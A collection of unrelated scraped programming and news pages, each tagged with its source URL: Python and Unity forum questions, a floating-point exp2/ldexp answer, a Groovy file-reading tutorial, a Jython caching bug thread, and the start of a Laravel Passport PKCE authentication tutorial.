As others have suggested, this namespace separation approach could be standardised through the use of a PEP 382 namespace package so that users could choose between (e.g.) "unittest" and "distutils" and "cutting_edge.unittest" and "cutting_edge.distutils" (with the latter being the regularly updated, new-features-and-all PyPI versions, and the former the traditional stable-API, bugfix-only standard library versions). That would probably be an improvement over the current ad hoc approach to naming separation for standard library updates.

I don't see any way to ever resolve the two competing goal sets (stability vs latest features) without permanently maintaining separate namespaces.

Cheers,
Nick.

--
Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia
https://mail.python.org/pipermail/python-ideas/2010-June/007402.html
Hi, I'm fairly new to Unity, and I've been having trouble solving this problem. I've been trying to use the accelerometer for my game. The sphere is supposed to move left, right, up and down to navigate a 3D maze. But for some reason, the sphere just moves left and right on its own or gets stuck. I followed Unity's own tutorial for using the accelerometer and it works, but when I attach a rigidbody to the sphere to have gravity act on it and have it fall on the ground (a plane), it seems to fall apart and either moves on its own or gets stuck. I've been using an iPad to test my code.

Edit: Thanks, that helped. I've changed the code and it works now. The only problem with it now is that the controls seem to be opposite/backwards. Tilting right goes left etc., and also if I stop the game running it doesn't reset the input from the last test. When I try to run the game again it'll have an input already in that won't change. I'm having to disconnect the iPad and then plug it back in so the new input starts at 0. Any ideas?

using UnityEngine;
using System.Collections;

public class PlayerController : MonoBehaviour
{
    public float speed;
    public Vector3 input;

    void Update ()
    {
        // Code for accelerometer
        input = new Vector3 (Input.acceleration.x, 0, Input.acceleration.z);
        rigidbody.AddForce(input * speed * Time.deltaTime);
    }
}

Does anyone have any ideas on how to get this working, having a shape act as a character with accelerometer controls? I have looked around for different solutions but nothing has worked. Any help would be much appreciated. Thanks.

transform.Translate should [almost] never be used on an object with a non-kinematic rigidbody attached. Use AddForce to drive rigidbody motion. Not sure that's your only issue, but it'll definitely cause weirdness.
https://answers.unity.com/questions/895307/accelerometer-for-a-sphere-character.html
WiPy 2.0: Cannot read internal flash without an SD card inserted

I'm trying to read a file from the internal flash, but to do so I must have an SD card inserted even though I'm not using it. If I try without a card I get this:

>>> from machine import SD
>>> sd = SD()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
OSError: the requested operation failed

It works fine when an SD card is inserted. Is what I'm trying to do possible?

Ah derp, yeah that works. I'm new to (micro)Python and coding for hardware, so learning lots at the moment. Thanks.

- Jurassic Pork (last edited by Jurassic Pork)

hello, what is your code to read your file? You don't need to use SD to play with the internal flash file system. Example to list files and read the content of the boot.py file in the internal flash file system:

import os
os.listdir()
f = open('boot.py')
f.read()
f.close()

Friendly, J.P
https://forum.pycom.io/topic/1226/wipy-2-0-cannot-read-internal-flash-without-a-sd-card-inserted
As it seems, not everybody knows that this function returns a pointer that you can use to gain control of the created weapon.

from commands.typed import TypedSayCommand
from memory import make_object
from messages import SayText2
from players.entity import Player
from weapons.entity import Weapon

@TypedSayCommand('!gimme')
def cmd_on_gimme(command_info, weapon_name):
    player = Player(command_info.index)
    weapon = make_object(Weapon, player.give_named_item(weapon_name))
    SayText2(f"Given {weapon.class_name} to {player.name}").send()

Approach #2. Weapon.create

When you create the entity yourself, obviously you have the reference to it, but the question is completely the opposite: how to give this weapon to a player. This is done by telling the player to touch the weapon. It doesn't even matter where the weapon was spawned.

from commands.typed import TypedSayCommand
from messages import SayText2
from players.entity import Player
from weapons.entity import Weapon

@TypedSayCommand('!gimme')
def cmd_on_gimme(command_info, weapon_name):
    player = Player(command_info.index)
    weapon = Weapon.create(weapon_name)
    weapon.spawn()
    player.touch(weapon.pointer)
    SayText2(f"Given {weapon.class_name} to {player.name}").send()

Now some information about CS:GO. As you may know, CS:GO introduced some weapons that share a classname (USP-S and HKP2000, for example, are both weapon_hkp2000). The difference between such weapons lies in their properties. For your convenience, Source.Python's Weapon.create converts aliases (say, weapon_usp_silencer) to the real classname and assigns the correct properties to the created entity to make sure that the resulting weapon will be a USP-S and not an HKP2000. Well, at least it tries to do so. From my testing,

Weapon.create('weapon_usp_silencer')

still spawns an HKP2000, but if you drop it and look at it, the hint will caption it as "USP-S". What about give_named_item then?
It's a native Source function and it should do all the magic by itself. And it successfully recognizes the weapon_usp_silencer alias. The only problem is that this function is too good. Nobody asks for it, but the function will look up the player's inventory to see which weapon - USP or HKP2000 - the player has equipped. Then... it just ignores the alias and spawns the one it thinks "correct". I.e. it can spawn a USP-S when you wanted it to spawn an HKP2000 and vice versa. How do you prevent that? The inventory lookup only succeeds if the player is on the correct team. Remember that USP/HKP2000 can only be bought by Counter-Terrorists? So when the player is on the Terrorists team, give_named_item will spawn the weapon that we ask for. The following code:

entity = Entity(player.index)
old_team = entity.team
entity.team = 2  # Terrorists
player.give_named_item('weapon_hkp2000')
entity.team = old_team

basically saves the player's current team, moves them to the Terrorists, gives the correct weapon and then restores their team. You might ask, why don't I use player.team? Because player.team is a shortcut to player.playerinfo.team, and changing the team using this shortcut will kill the player in the process. entity.team, on the other side, is more raw and allows us to change the player's team without any casualties.
https://forums.sourcepython.com/viewtopic.php?f=31&t=1597&sid=56eb81d814ff87b7d0159623aa2775e0
Import from dump (.dmp) file. I'm running Oracle Database 11g Enterprise Edition Release 11.1.0.6.0. The import statement I'm using is:

Code:
impdp system/password@orcl full=Y DIRECTORY=data_pump_dir dumpfile=mydmpfile.dmp logfile=min.log

and the error I'm getting is "incompatible versionnumber 3.1 in the dumpfile mydmpfile.dmp". The dump file was exported using Oracle 11.2.0.2.0. I tried to download/unzip the client version of instantclient 11.2.0.2 and add it to the PATH variable in Windows and then re-run the script, but it didn't work. Anyone have a suggestion on how I should go from here to import this dump file without reinstalling the whole database? Thanks in advance!
http://forums.devshed.com/oracle-development-96/importing-dmp-file-incompatible-versionnumber-930039.html
10 May 2012 05:31 [Source: ICIS news] SINGAPORE (ICIS)--HMEL is unable to start up the PP unit by end-April as planned because of an outage at its upstream 9m tonne/year refinery, the source said. The refinery, which is at the same site, was commissioned on 29 March. "The refinery has been restarted in early May after an unexpected brief shutdown. The PP unit will start up on 20 May, producing homopolymer grades for commercial sales," he said. These include biaxially oriented PP (BOPP) film, cast film, extrusion, fibre and filaments, injection moulding, raffia, thermoforming and tubular quench (TQ) grades. Company officials could not be immediately reached for comment. HMEL is a joint venture between Hindustan Petroleum Corp Ltd (HPCL) and Mittal Energy Investment. Each company holds a 49% stake in HMEL, while the remaining 2% interest is held by financial
http://www.icis.com/Articles/2012/05/10/9558102/indias-hmel-delays-start-up-of-new-punjab-pp-unit-to-20.html
It seems that if the floating-point representation has radix 2 (i.e. FLT_RADIX == 2), std::ldexp(1, x) should be equivalent to std::exp2(x), since both compute 2^x.

exp2(x) and ldexp(x,i) perform two different operations. The former computes 2^x, where x is a floating-point number, while the latter computes x * 2^i, where i is an integer. For integer values of x, exp2(x) and ldexp(1,int(x)) would be equivalent, provided the conversion of x to integer doesn't overflow.

The question about the relative efficiency of these two functions doesn't have a clear-cut answer. It will depend on the capabilities of the hardware platform and the details of the library implementation. While conceptually, ldexpf() looks like simple manipulation of the exponent part of a floating-point operand, it is actually a bit more complicated than that, once one considers overflow and gradual underflow via denormals. The latter case involves the rounding of the significand (mantissa) part of the floating-point number. As ldexp() is generally an infrequently used function, it is in my experience fairly common that less of an optimization effort is applied to it by math library writers than to other math functions.

On some platforms, ldexp(), or a faster (custom) version of it, will be used as a building block in the software implementation of exp2(). The following code provides an exemplary implementation of this approach for float arguments:

#include <cmath>

/* Compute exponential base 2.
   Maximum ulp error = 0.86770 */
float my_exp2f (float a)
{
    const float cvt = 12582912.0f;   // 0x1.8p23
    const float large = 1.70141184e38f; // 0x1.0p127
    float f, r;
    int i;

    // exp2(a) = exp2(i + f); i = rint (a)
    r = (a + cvt) - cvt;
    f = a - r;
    i = (int)r;
    // approximate exp2(f) on interval [-0.5,+0.5]
    r = 1.53720379e-4f;              // 0x1.426000p-13f
    r = fmaf (r, f, 1.33903872e-3f); // 0x1.5f055ep-10f
    r = fmaf (r, f, 9.61817801e-3f); // 0x1.3b2b20p-07f
    r = fmaf (r, f, 5.55036031e-2f); // 0x1.c6af7ep-05f
    r = fmaf (r, f, 2.40226522e-1f); // 0x1.ebfbe2p-03f
    r = fmaf (r, f, 6.93147182e-1f); // 0x1.62e430p-01f
    r = fmaf (r, f, 1.00000000e+0f); // 0x1.000000p+00f
    // exp2(a) = 2**i * exp2(f);
    r = ldexpf (r, i);
    if (!(fabsf (a) < 150.0f)) {
        r = a + a; // handle NaNs
        if (a < 0.0f) r = 0.0f;
        if (a > 0.0f) r = large * large; // + INF
    }
    return r;
}

Most real-life implementations of exp2() do not invoke ldexp(), but a custom version, for example when fast bit-wise transfer between integer and floating-point data is supported, here represented by internal functions __float_as_int() and __int_as_float() that re-interpret an IEEE-754 binary32 as an int32 and vice versa:

/* For a in [0.5, 4), compute a * 2**i, -250 < i < 250 */
float fast_ldexpf (float a, int i)
{
    int ia = (i << 23) + __float_as_int (a); // scale by 2**i
    a = __int_as_float (ia);
    if ((unsigned int)(i + 125) > 250) { // |i| > 125
        i = (i ^ (125 << 23)) - i; // ((i < 0) ? -125 : 125) << 23
        a = __int_as_float (ia - i); // scale by 2**(+/-125)
        a = a * __int_as_float ((127 << 23) + i); // scale by 2**(+/-(i%125))
    }
    return a;
}

On other platforms, the hardware provides a single-precision version of exp2() as a fast hardware instruction. Internal to the processor these are typically implemented by a table lookup with linear or quadratic interpolation.
On such hardware platforms, ldexp(float) may be implemented in terms of exp2(float), for example: float my_ldexpf (float x, int i) { float r, fi, fh, fq, t; fi = (float)i; /* NaN, Inf, zero require argument pass-through per ISO standard */ if (!(fabsf (x) <= 3.40282347e+38f) || (x == 0.0f) || (i == 0)) { r = x; } else if (abs (i) <= 126) { r = x * exp2f (fi); } else if (abs (i) <= 252) { fh = (float)(i / 2); r = x * exp2f (fh) * exp2f (fi - fh); } else { fq = (float)(i / 4); t = exp2f (fq); r = x * t * t * t * exp2f (fi - 3.0f * fq); } return r; } Lastly, there are platforms that basically provide both exp2() and ldexp() functionality in hardware, such as the x87 instructions F2XM1 and FSCALE on x86 processors.
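The operational difference between the two functions is easy to demonstrate in a few lines. A quick sketch in Python, whose math.ldexp mirrors C's ldexp (2.0 ** x stands in for exp2):

```python
import math

# ldexp(x, i) scales x by an integer power of two; exp2 accepts any float exponent.
for i in [-3, 0, 5, 10]:
    assert math.ldexp(1.0, i) == 2.0 ** i  # equal for integer exponents

# ldexp is exact: the significand of x is preserved bit-for-bit,
# since multiplying by a power of two only adjusts the exponent field.
x = 0.7
assert math.ldexp(x, 8) == x * 256.0

# exp2 additionally handles fractional exponents, which ldexp cannot express.
print(2.0 ** 0.5)  # 1.4142135623730951
```

For integer arguments the two agree, which is exactly the equivalence of exp2(x) and ldexp(1,int(x)) noted above.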
https://codedump.io/share/3fE2RxLS2RPX/1/difference-between-ldexp1-x-and-exp2x
All, I have this very basic script that's producing some odd output. What I need to do is constantly ping a server, and when/if that server stops responding, I want to write the timestamp and " timed out" to a file. We're trying to lock down a time as to when something is going down. The code is below, and what's happening is that while the server (in this case a host that I'm able to block icmp packets for on a router) is responding, the return code is 0 and it's fine, but once I put an acl on the router, the pings stop responding and now the script alternates between 0 and 1. Below is the code and I'll paste the result below it:

```python
import os, datetime, sys, string
from subprocess import call, Popen
import subprocess

def Help():
    print "Must supply a single IP address to ping and filename"
    print "\n"
    print "This application can be run from multiple"
    print "command windows"

if len(sys.argv) < 3 or len(sys.argv) > 3:
    Help()

address = sys.argv[1]
filename = sys.argv[2]

while True:
    ping = Popen(['ping', '-n', '1', address.strip()],
                 stdout=subprocess.PIPE, shell=True)
    pingResponse = ping.wait()
    print "Current response code is " + str(pingResponse)
    if pingResponse == 0:
        print pingResponse
        output = open(filename, 'a')
        output.write("[" + datetime.datetime.now().strftime("%H:%M:%S.%f") + "]" + " Success\n")
        output.close()
    if pingResponse == 1:
        print pingResponse
        output = open(filename, 'a')
        output.write("[" + datetime.datetime.now().strftime("%H:%M:%S.%f") + "]" + " Timed out\n")
        output.close()
```

The result:

[12:48:27.772000] Success
[12:48:28.033000] Success
[12:48:28.300000] Success
[12:48:28.556000] Success
[12:48:28.813000] Success
[12:48:32.714000] Timed out
[12:48:32.965000] Success
[12:48:36.715000] Timed out
[12:48:36.967000] Success
[12:48:40.711000] Timed out
[12:48:40.962000] Success
[12:48:44.716000] Timed out
[12:48:44.979000] Success
[12:48:49.213000] Timed out
[12:48:49.466000] Success
[12:48:53.212000] Timed out
[12:48:53.467000] Success
[12:48:57.216000] Timed out
[12:48:57.495000] Success
[12:49:01.722000] Timed out
[12:49:01.980000] Success
[12:49:06.212000] Timed out
[12:49:06.469000] Success
[12:49:10.214000] Timed out
[12:49:10.476000] Success
[12:49:14.713000] Timed out

The alternating success and time outs was when the device was truly down. I need to somehow clear out the return code, but I'm not sure how to do that. Thanks!
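The thread's answer isn't included in this excerpt, but one common explanation is that Windows ping can exit with code 0 when a router replies "Destination host unreachable" — a reply was received, just not from the target. A hedged sketch of a more reliable check that inspects the reply text instead of the exit code (function name and sample strings are illustrative, not from the thread):

```python
def host_is_up(ping_output):
    """Heuristic reachability check for Windows ping output.

    A reply from the target itself carries a TTL field, while a router's
    "Destination host unreachable" notice does not; Windows ping can exit 0
    for the latter, which would explain the mixed return codes above.
    """
    return "TTL=" in ping_output.upper()

print(host_is_up("Reply from 10.0.0.5: bytes=32 time=1ms TTL=128"))      # True
print(host_is_up("Reply from 10.0.0.1: Destination host unreachable."))  # False
```

In the script above, this would mean reading ping.stdout and checking the text rather than relying on ping.wait() alone.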
https://www.daniweb.com/programming/software-development/threads/463402/ping-looping-help
Reading a File in Groovy

Last modified: February 9, 2019

1. Overview

In this quick tutorial, we'll explore different ways of reading a file in Groovy.

Groovy provides convenient ways to handle files. We'll concentrate on the File class, which has some helper methods for reading files. Let's explore them one by one in the following sections.

2. Reading a File Line by Line

There are many Groovy IO methods, like readLine and eachLine, available for reading files line by line.

2.1. Using File.withReader

Let's start with the File.withReader method. It creates a new BufferedReader under the covers that we can use to read the contents using the readLine method.

For example, let's read a file line by line and print each line. We'll also return the number of lines:

```groovy
int readFileLineByLine(String filePath) {
    File file = new File(filePath)
    def line, noOfLines = 0;
    file.withReader { reader ->
        while ((line = reader.readLine()) != null) {
            println "${line}"
            noOfLines++
        }
    }
    return noOfLines
}
```

Let's create a plain text file fileContent.txt with the following contents and use it for the testing:

Line 1 : Hello World!!!
Line 2 : This is a file content.
Line 3 : String content

Let's test out our utility method:

```groovy
def 'Should return number of lines in File given filePath' () {
    given:
        def filePath = "src/main/resources/fileContent.txt"
    when:
        def noOfLines = readFile.readFileLineByLine(filePath)
    then:
        noOfLines
        noOfLines instanceof Integer
        assert noOfLines == 3
}
```

The withReader method can also be used with a charset parameter like UTF-8 or ASCII to read encoded files. Let's see an example:

```groovy
new File("src/main/resources/utf8Content.html").withReader('UTF-8') { reader ->
    def line
    while ((line = reader.readLine()) != null) {
        println "${line}"
    }
}
```

2.2. Using File.eachLine

We can also use the eachLine method:

```groovy
new File("src/main/resources/fileContent.txt").eachLine { line ->
    println line
}
```

2.3. Using File.newInputStream with InputStream.eachLine

Let's see how we can use the InputStream with eachLine to read a file:

```groovy
def is = new File("src/main/resources/fileContent.txt").newInputStream()
is.eachLine {
    println it
}
is.close()
```

When we use the newInputStream method, we have to deal with closing the InputStream. If we use the withInputStream method instead, it will handle closing the InputStream for us:

```groovy
new File("src/main/resources/fileContent.txt").withInputStream { stream ->
    stream.eachLine { line ->
        println line
    }
}
```

3. Reading a File into a List

Sometimes we need to read the content of a file into a list of lines.

3.1. Using File.readLines

For this, we can use the readLines method, which reads the file into a List of Strings.

Let's have a quick look at an example that reads file content and returns a list of lines:

```groovy
List<String> readFileInList(String filePath) {
    File file = new File(filePath)
    def lines = file.readLines()
    return lines
}
```

Let's write a quick test using fileContent.txt:

```groovy
def 'Should return File Content in list of lines given filePath' () {
    given:
        def filePath = "src/main/resources/fileContent.txt"
    when:
        def lines = readFile.readFileInList(filePath)
    then:
        lines
        lines instanceof List<String>
        assert lines.size() == 3
}
```

3.2. Using File.collect

We can also read the file content into a List of Strings using the collect API:

```groovy
def list = new File("src/main/resources/fileContent.txt").collect {it}
```

3.3. Using the as Operator

We can even leverage the as operator to read the contents of the file into a String array:

```groovy
def array = new File("src/main/resources/fileContent.txt") as String[]
```

4. Reading a File into a Single String

4.1. Using File.text

We can read an entire file into a single String simply by using the text property of the File class.
Let's have a look at an example:

```groovy
String readFileString(String filePath) {
    File file = new File(filePath)
    String fileContent = file.text
    return fileContent
}
```

Let's verify this with a unit test:

```groovy
def 'Should return file content in string given filePath' () {
    given:
        def filePath = "src/main/resources/fileContent.txt"
    when:
        def fileContent = readFile.readFileString(filePath)
    then:
        fileContent
        fileContent instanceof String
        fileContent.contains("""Line 1 : Hello World!!!
Line 2 : This is a file content.
Line 3 : String content""")
}
```

4.2. Using File.getText

If we use the getText(charset) method, we can read the content of an encoded file into a String by providing a charset parameter like UTF-8 or ASCII:

```groovy
String readFileStringWithCharset(String filePath) {
    File file = new File(filePath)
    String utf8Content = file.getText("UTF-8")
    return utf8Content
}
```

Let's create an HTML file with UTF-8 content named utf8Content.html for the unit testing. Let's see the unit test:

```groovy
def 'Should return UTF-8 encoded file content in string given filePath' () {
    given:
        def filePath = "src/main/resources/utf8Content.html"
    when:
        def encodedContent = readFile.readFileStringWithCharset(filePath)
    then:
        encodedContent
        encodedContent instanceof String
}
```

5. Reading a Binary File with File.bytes

Groovy makes it easy to read non-text or binary files. By using the bytes property, we can get the contents of the File as a byte array:

```groovy
byte[] readBinaryFile(String filePath) {
    File file = new File(filePath)
    byte[] binaryContent = file.bytes
    return binaryContent
}
```

We'll use a png image file, sample.png, for the unit testing. Let's see the unit test:

```groovy
def 'Should return binary file content in byte array given filePath' () {
    given:
        def filePath = "src/main/resources/sample.png"
    when:
        def binaryContent = readFile.readBinaryFile(filePath)
    then:
        binaryContent
        binaryContent instanceof byte[]
        binaryContent.length == 329
}
```

6. Conclusion

In this quick tutorial, we've seen different ways of reading a file in Groovy using various methods of the File class, along with the BufferedReader and InputStream. The complete source code of these implementations and unit test cases can be found in the GitHub project.
https://www.baeldung.com/groovy-file-read
Created on 2016-03-18.00:08:39 by darjus, last changed 2017-11-04.20:31:48 by jeff.allen. Fixed as of Mar 19, 2016 6:56:12 PM

io.netty.channel.ChannelInitializer exceptionCaught
WARNING: Failed to initialize a channel. Closing: [id: 0xabe1bf32, /127.0.0.1:63059 => /127.0.0.1:63054]
Traceback (most recent call last):
  File "/Users/darjus/Documents/jython/dist/Lib/_socket.py", line 639, in initChannel
    child._ensure_post_connect()
  File "/Users/darjus/Documents/jython/dist/Lib/_socket.py", line 1421, in _ensure_post_connect
    self._post_connect()
  File "/Users/darjus/Documents/jython/dist/Lib/_socket.py", line 877, in _post_connect
    self.channel.pipeline().addLast(self.python_inbound_handler)
SystemError: __getattribute__ not found on type DefaultChannelPipeline

Looks like there's a bug in the new synchronization code. Found it while running some unrelated stuff.

Hey. Is there a way to reproduce this issue (on a fast system)? Does someone have jstack output available for the deadlock?

Fixed by

Not sure if it's actually related to this problem or not, as it's closed, but a CI build just experienced something related to this. See:

After. I agree with Jeff's analysis. Clearly the necessary cycle of waiting to get a deadlock was caused by what #2536 identified: finally blocks for releasing internal locks not being called due to out-of-memory errors. (This scenario violated the contract that we assumed through the usage of ConcurrentHashMap.) Other than that issue, we have had no reports of other deadlocks in this specific code; and I also do not see any deadlock path in the use of class_to_type. We should also synchronize fromClassSkippingInners. This change restores correctness.

Next, let's look at our caching, and its corresponding performance.
Using weak keys/weak values in class_to_type means that when working with Java objects (calling methods, accessing attributes), Python code that does not maintain a strong reference to the Java class will cause the Jython runtime to constantly rebuild these entries in class_to_type. Here are the ways that such strong references would be established:

1. exposedTypes (so Jython's internals)
2. imports of Java classes into a Python namespace
3. references to `type(java_obj)`
4. subclassing of a Java class by a Python class

References to Java *objects*, including objects from factory methods; indirect construction, such as `java.util.HashMap()`; and callbacks (Netty, re/json/strptime) would not introduce such references to Python types for Java *classes*. But calling methods, using attributes, or otherwise getting the Python type on the Java object would require this entry in class_to_type to be added, potentially to be quickly discarded by generational GC. Computing these entries is relatively expensive, especially if a given class C has inner classes (and this is a general type graph expansion). See also the analysis in (scenario 3); our mapping in class_to_type is a common pattern seen in Java systems.

What if instead of the current one-level cache, we had a two-level cache? Level 1 uses weak keys/weak values for the class/type entries (C, T); (C, T) entries that are expired from Level 1 are moved to Level 2; Level 2 uses an expiration time so a ClassLoader could be unloaded in some reasonable amount of time.

To implement:

1. Level 1 cache is a direct replacement of class_to_type with CacheBuilder weak keys/weak values/removal listener. Also, we will not attempt to expose it as a Map going forward; adjust class_to_type usage accordingly.
2. Level 2 cache is weak keys/strong values/expires after write. We can tune this expiration as was done with the regex cache and the python.sre.cachespec option.
3. For removalListener: (C, T) entries that are removed from Level 1 will use removalListener to get placed in Level 2 (safe because Level 1 is concurrent; and obviously hard refs would prevent it from being removed while under construction).
4. Try both caches when looking up the type T for class C. Because this is synchronized, there's no visible inconsistency; if there is no entry for C because it was removed, simply recompute T'. There is a small window of time during which it could be in the process of being moved to Level 2, but this does not affect correctness; (C, T) will eventually be expired from Level 2, and (C, T') is a valid replacement for it (because there can be no hard refs to T outside the Level 2 cache itself).

Lastly, ClassValue looks potentially useful as an alternative for publishing PyType objects into a cache. But we need to address two key questions:

1. Whether ClassValue#computeValue would work properly in the re-entrant case where the class graph from a given class C is explored, as is done for inners, possibly referring back to C. This is why we could not get the publication of the type in the map done after the init (as one would usually want to do!) with putIfAbsent; class C would be referenced, and it would attempt to build again (and stack overflow). No solution I tried could break this problem.
2. When to call ClassValue#removeValue! We still have to keep track of the cache with respect to PyType.

I'd like to believe we fixed this with #2609 in, and that the reworking of PyType in has addressed concerns people might have about needless locking. The critical similarity is a type not having an attribute you know it does, and the explanation is that you looked before we finished constructing it. Can anyone produce evidence to the contrary?
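The proposed two-level design can be modeled in a few lines. This is an illustrative Python sketch, not Jython code — weakref.WeakValueDictionary stands in for CacheBuilder's weak values, a timestamp check stands in for expire-after-write, and the class name and TTL are assumed placeholders:

```python
import time
import weakref

class TwoLevelTypeCache:
    """Illustrative model of the proposed (C, T) cache."""

    def __init__(self, ttl_seconds=60.0):
        self._level1 = weakref.WeakValueDictionary()  # weak values: entries vanish with T
        self._level2 = {}                             # key -> (value, expiry); strong values
        self._ttl = ttl_seconds

    def demote(self, key, value):
        # In the real design, a removal listener moves entries evicted from
        # Level 1 here, so a ClassLoader can still be unloaded once they expire.
        self._level2[key] = (value, time.monotonic() + self._ttl)

    def get(self, key, compute):
        value = self._level1.get(key)
        if value is None:
            entry = self._level2.pop(key, None)
            if entry is not None and entry[1] > time.monotonic():
                value = entry[0]
            else:
                # Recomputing T' is always a valid replacement for an expired T.
                value = compute(key)
            self._level1[key] = value
        return value

# Repeated lookups with a live reference hit Level 1 and compute only once.
class FakeType: ...
cache = TwoLevelTypeCache()
t = cache.get("com.example.C", lambda key: FakeType())
assert cache.get("com.example.C", lambda key: FakeType()) is t
```

Dropping all hard references to the value lets GC clear the Level 1 entry, after which the value is either revived from Level 2 (if demoted and unexpired) or simply recomputed — matching point 4 above.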
http://bugs.jython.org/issue2487
Modifying SL Animations Using C# - Page 3

by kirupa | 7 November 2008

In the previous page, you looked at your animation in fairly great detail and gave the keyframes responsible for animating your gradient a name - Color0 and Color1. In this page, let's add some code to make all of this work.

Adding the Code

You already have some code that plays your animation when you click on the button. What we are going to do is modify our code so that a random color is picked each time you click on the Randomize Color button, instead of having the same animation play every time. Let's do that now.

Open this same project in Visual Studio by going to your Project pane, right-clicking on your solution icon, and selecting Edit in Visual Studio:

[ you can choose to Edit in Visual Studio directly from the project pane ]

A few seconds later, Visual Studio will open. Open Page.xaml.cs inside it, and you will see the following code displayed:

The RandomizeColors method is the event handler your Button's click event is hooked up to, so each time you click your button, the RandomizeColors method gets called. Currently, your code just plays the ChangeColor storyboard by calling the Begin method on it. We are going to modify this a bit.

Look at your code and add the following lines shown below. You can also just copy everything below and overwrite everything below your line containing your namespace declaration if you find that easier:

Once you have copied and pasted the above code, run your app from either inside Visual Studio or Expression Blend by pressing F5. You should not receive any errors, and you will see your app appear as before. The difference is that, when you click (and keep clicking) on your Randomize Color button, your animation plays each time with a different color.
At this point, you have a fully working application that does essentially what you want it to do. There is one more thing left, though, and that is seeing why the code works the way it does. We'll do that on the next page.

Onwards to the next page!
https://www.kirupa.com/blend_silverlight/modifying_animation_sl2_pg3.htm
In this post I will show you how you can use PKCE (Proof Key for Code Exchange) for authentication. I will use Nuxt.js, because that's what I use in my day to day workflow, but I will try to make it as generic as possible so that it can be implemented in other frameworks or even in vanilla JavaScript. The Proof Key for Code Exchange extension is.

The basic workflow of the PKCE is this:

1. The user requests to log in.
2. The SPA makes a random string for `state` and for `code_verifier`, then it hashes the `code_verifier` (we will use SHA256 as the hashing algorithm) and converts it to a base64url-safe string; that's our `code_challenge`. Then it saves the `state` and `code_verifier`.
3. It makes a GET request to the backend with the query parameters needed: `client_id`, `redirect_uri`, `response_type`, `scope`, `state`, `code_challenge` and `code_challenge_method` (there can be other required parameters).
4. The user is redirected to the backend login page.
5. The user submits their credentials.
6. The backend validates the submitted credentials and authenticates the user.
7. The backend then proceeds to the intended URL from step 3.
8. It returns a response containing `code` and `state`.
9. The SPA then checks if the returned `state` is equal to the `state` that was saved when we made the initial request (in step 2).
10. If it is the same, the SPA makes another request with query parameters `grant_type`, `client_id`, `redirect_uri`, `code_verifier` (that we saved in step 2) and `code` (that was returned by the backend) to get the token.

For those who are lazy and don't want to read yet another post, here are the links for the GitHub repositories:

Backend

I will assume that you already have a Laravel application set up, so I will go directly to the important parts of this post.

Setting Laravel Passport

We will use Laravel Passport, which provides a full OAuth2 server implementation for your Laravel application. Specifically, we will use the Authorization Code Grant with PKCE.
As stated in the Passport documentation:

The Authorization Code grant with "Proof Key for Code Exchange" (PKCE) is a secure way to authenticate single page applications or native applications to access your API. This grant should be used when you can't guarantee that the client secret will be stored confidentially or in order to mitigate the threat of having the authorization code intercepted by an attacker. A combination of a "code verifier" and a "code challenge" replaces the client secret when exchanging the authorization code for an access token.

We are going to require Passport through Composer:

```shell
composer require laravel/passport
```

Run the migrations:

```shell
php artisan migrate
```

And install Passport:

```shell
php artisan passport:install
```

Next, we should add the HasApiTokens trait to the User model:

```php
namespace App;

use Illuminate\Foundation\Auth\User as Authenticatable;
use Illuminate\Notifications\Notifiable;
use Laravel\Passport\HasApiTokens;

class User extends Authenticatable
{
    use HasApiTokens, Notifiable;

    // [code]
}
```

Register the Passport routes that we need within the boot method of AuthServiceProvider, and set the expiration time of the tokens:

```php
// [code]
use Laravel\Passport\Passport;

class AuthServiceProvider extends ServiceProvider
{
    // [code]

    public function boot()
    {
        $this->registerPolicies();

        Passport::routes(function ($router) {
            $router->forAuthorization();
            $router->forAccessTokens();
            $router->forTransientTokens();
        });

        Passport::tokensExpireIn(now()->addMinutes(5));
        Passport::refreshTokensExpireIn(now()->addDays(10));
    }
}
```

Set the api driver to passport in config/auth.php:

```php
// [code]
'guards' => [
    'web' => [
        'driver' => 'session',
        'provider' => 'users',
    ],

    'api' => [
        'driver' => 'passport',
        'provider' => 'users',
        'hash' => false,
    ],
],
// [code]
```

And the last step is to create a PKCE client:

```shell
php artisan passport:client --public
```

You are then going to be prompted with some questions; here are my answers:

Which user ID should the client be assigned to? -> 1
What should we name the client? -> pkce
Where should we redirect the request after authorization? -> (your SPA domain)

Setting CORS

For Laravel versions < 7: manually install fruitcake/laravel-cors and follow along, or create your own CORS middleware.

For Laravel versions >= 7: change your config/cors.php so that you add oauth/token to your paths, and your SPA origin to allowed_origins. My config looks like this:

```php
return [
    'paths' => ['api/*', 'oauth/token'],
    'allowed_methods' => ['*'],
    'allowed_origins' => [''],
    'allowed_origins_patterns' => [],
    'allowed_headers' => ['*'],
    'exposed_headers' => [],
    'max_age' => 0,
    'supports_credentials' => false,
];
```

Creating the API

Create the routes in routes/web.php. Now this is important: the login route MUST be placed in routes/web.php. All the other routes can be in routes/api.php, but the login route must be in routes/web.php, because we will need the session.

```php
Route::view('login', 'login');
Route::post('login', 'AuthController@login')->name('login');
```

Now, create the login view and the AuthController. In resources/views, create a new login.blade.php file, and in there we will put a basic form. I won't apply any style to it:

```html
<form method="post" action="{{ route('login') }}">
    @csrf
    <label for="email">Email:</label>
    <input type="text" name="email">

    <label for="password">Password:</label>
    <input type="password" name="password">

    <button>Login</button>
</form>
```

Make the AuthController and create a login method in there:

```php
// [code]
public function login(Request $request)
{
    if (auth()->guard()->attempt($request->only('email', 'password'))) {
        return redirect()->intended();
    }

    throw new \Exception('There was some error while trying to log you in');
}
```

In this method, we attempt to log in the user with the credentials they provided. If the login is successful, we redirect them to the intended URL, which will be oauth/authorize with all the query parameters; if not, an exception is thrown.

OK, that was it for the backend. Now let's make the SPA.
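Before switching to the SPA, it may help to see the request it will make first (step 3 of the flow) in isolation. A minimal sketch in Python of assembling the oauth/authorize URL — the base URL, redirect URI, and values here are placeholders, not the post's actual configuration:

```python
from urllib.parse import urlencode

def build_authorize_url(base_url, client_id, redirect_uri, state, code_challenge):
    """Assemble the oauth/authorize URL that starts the PKCE flow."""
    params = {
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "response_type": "code",
        "scope": "*",
        "state": state,
        "code_challenge": code_challenge,
        "code_challenge_method": "S256",
    }
    return f"{base_url}/oauth/authorize?{urlencode(params)}"

url = build_authorize_url("http://backend.test", 1,
                          "http://spa.test/auth", "abc123", "xyz789")
print(url)
```

These are exactly the parameters Passport's oauth/authorize route expects; the SPA below builds the same string in its loginUrl computed property.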
Frontend

Create a new Nuxt application and select the tools you want to use; I will just use the axios module:

```shell
npx create-nuxt-app <name-of-your-app>
```

